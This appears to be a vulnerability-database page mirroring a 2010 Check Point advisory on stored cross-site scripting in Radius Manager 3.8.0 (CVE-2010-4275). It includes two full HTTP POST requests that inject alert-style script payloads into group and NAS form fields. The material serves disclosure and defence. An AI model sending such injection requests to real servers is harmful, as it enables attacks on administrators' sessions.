Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Radius Manager 3.8.0 - Multiple Cross-Site Scripting Vulnerabilities

🗓️ 17 Dec 2010 00:00:00Reported by Rodrigo Rubira BrancoType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 33 Views

Multiple Cross Site Scripting in Radius Manager 3.8.0 - Easy management for Mikrotik, Cisco, Chillispot, and StarOS router

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2010-4275
17 Dec 201000:00
circl
CVE		CVE-2010-4275
22 Dec 201001:00
cve
Cvelist		CVE-2010-4275
22 Dec 201001:00
cvelist
EUVD		EUVD-2010-4248
7 Oct 202500:30
euvd
exploitpack		Radius Manager 3.8.0 - Multiple Cross-Site Scripting Vulnerabilities
17 Dec 201000:00
exploitpack
NVD		CVE-2010-4275
22 Dec 201003:00
nvd
Packet Storm		Radius Manager Cross Site Scripting
17 Dec 201000:00
packetstorm
Prion		Cross site scripting
22 Dec 201003:00
prion
Check Point Software Technologies - Vulnerability Discovery Team (VDT)
http://www.checkpoint.com/defense/

Radius Manager Multiple Cross Site Scripting Issues
CVE-2010-4275


INTRODUCTION

Radius Manager is a centralized way for administration of Mikrotik, Cisco, Chillispot and StarOS routers and wireless 
access points.  It has
a centralized accounting system that uses Radius, provinding easy user and accounting management for ISP's.

This problem was confirmed in the following versions of the Radius Manager, other versions maybe also affected.

Radius Manager 3.8.0


CVSS Scoring System

The CVSS score is: 6.4
        Base Score: 6.7
        Temporal Score: 6.4
We used the following values to calculate the scores:
        Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:N
        Temporal score is: E:F/RL:U/RC:C


DETAILS

The Radius Manager system is affected by Multiple Stored Cross Site Scripting.  The “Group Name” and “Description” in 
“new_usergroup” menu do not 
sanitize input data, allowing attacker to store malicious javascript code in a page.

The same thing occurs with “new_nas” menu

Request:
http://<server>/admin.php?cont=update_usergroup&id=1
POST /admin.php?cont=update_usergroup&id=1 HTTP/1.1
Host: <server>
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914
Firefox/3.6.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://<server>/admin.php?cont=edit_usergroup&id=1
Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC; 
listusers_ordercol=username; 
listusers_ordertype=DESC; listusers_lastorder=username
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&descr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Submit=Update

Request 2:
http://<serveR>/admin.php?cont=store_nas
POST /admin.php?cont=store_nas HTTP/1.1
Host: <server>
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914
Firefox/3.6.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://<server>/admin.php?cont=new_nas
Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC; 
listusers_ordercol=username; 
listusers_ordertype=DESC; listusers_lastorder=username
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
name=Name&nasip=10.0.0.1&type=0&secret=1111&descr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Submit=Add+NAS



CREDITS

This vulnerability has been brought to our attention by Ulisses Castro from Conviso IT Security company 
(http://www.conviso.com.br) and researched 
internally by Rodrigo Rubira Branco from the Check Point Vulnerability Discovery Team (VDT).



Rodrigo Rubira Branco
Senior Security Researcher
Vulnerability Discovery Team (VDT)
Check Point Software Technologies
http://www.checkpoint.com/defense

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Dec 2010 00:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 23.5
EPSS0.00144
radius managercross site scriptingmikrotikciscochillispotstaroseasy managementcheck pointvulnerability discovery team
33